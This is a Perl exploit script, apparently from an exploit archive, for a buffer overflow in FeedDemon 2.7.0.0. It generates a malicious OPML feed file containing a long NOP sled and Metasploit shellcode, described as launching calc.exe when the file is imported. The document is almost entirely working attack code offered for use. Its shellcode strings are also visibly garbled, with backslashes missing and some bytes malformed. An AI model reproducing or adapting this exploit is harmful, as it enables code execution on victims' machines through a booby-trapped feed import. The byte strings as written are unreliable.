#!/usr/local/bin/perl
#-----------------------------------------------------------------------------
# FeedDemon version 2.7.0.0 Buffer overFlow
# Reference:
#	http://security.bkis.vn/?p=329
#	http://www.securityfocus.com/bid/33630/info
#	http://secunia.com/advisories/33718/
# Tested in Windows XP Sp2 (English)
# Created by cenjan (xcenjanx@yahoo.com)
# Description: 	 + This code generates a opml file (feeddemonexploit.opml)
#              		 + Import that file by the Import Feed function of Feed Demon
#               		+ The calc.exe will execute
#-----------------------------------------------------------------------------
my $head='<opml version="1.1"><body><outline text="';
my $overflow = "x90" x 8006;

# Shellcode by Metasploit
my $devil=
"x31xC9x83xE9xDExD9xEExD9x74x24xF4x5Bx81x73x13xEC".
"x2Dx36x5Ex83xEBxFCxE2xF4x10xC5x72x5ExECx2DxBD".
"x1BxD0xA6x4Ax5Bx94x2CxD9xD5xA3x35xBDx1xCCx2C".
"xDDx17x67x19xBDx5Fx2x1CxF6xC7x40xA9xF6x2AxEB".
"xECxFCx53xEDxEFxDDxAAxD7x79x12x5Ax99xC8xBDx1".
"xC8x2CxDDx38x67x21x7DxD5xB3x31x37xB5x67x31xBD".
"x5Fx7xA4x6Ax7AxE8xEEx7x9Ex88xA6x76x6Ex69xED".
"x4Ex52x67x6Dx3AxD5x9Cx31x9BxD5x84x25xDDx57x67".
"xADx86x5ExECx2DxBDx36xD0x72x7xA8x8Cx7BxBFxA6".
"x6FxEDx4DxEx84xDDxBCx5AxB3x45xAExA0x66x23x61".
"xA1xBx4Ex57x32x8Fx2Dx36x5Ex90x90x90x90x90x90".
"x90x90xEDx1Ex94x7Cx90x90x90x90x90x90x90x90x90".
"x90x90x90x90x90x89xE1xFExCDxFExCDxFExCDxFExCD".
"xFExCDxFExCDx89xCCxFFxE4";

my $tail='"><outline text="BKIS" title="SVRT" type="rss" xmlUrl="http://milw0rm.com/rss.php"/></outline></body></opml>';
open (f,'>feeddemonexploit.opml');
print f "xffxfe";
close(f);

open (f,'>>:encoding(ucs-2le)','feeddemonexploit.opml');
print f $head;
close(f);

open (f,'>>feeddemonexploit.opml');
print f $overflow;
print f $devil;
close(f);

open (f,'>>:encoding(ucs-2le)','feeddemonexploit.opml');
print f $tail;
close (f);
print "Create exploit file successfully!";

# www.Syue.com [2009-02-09]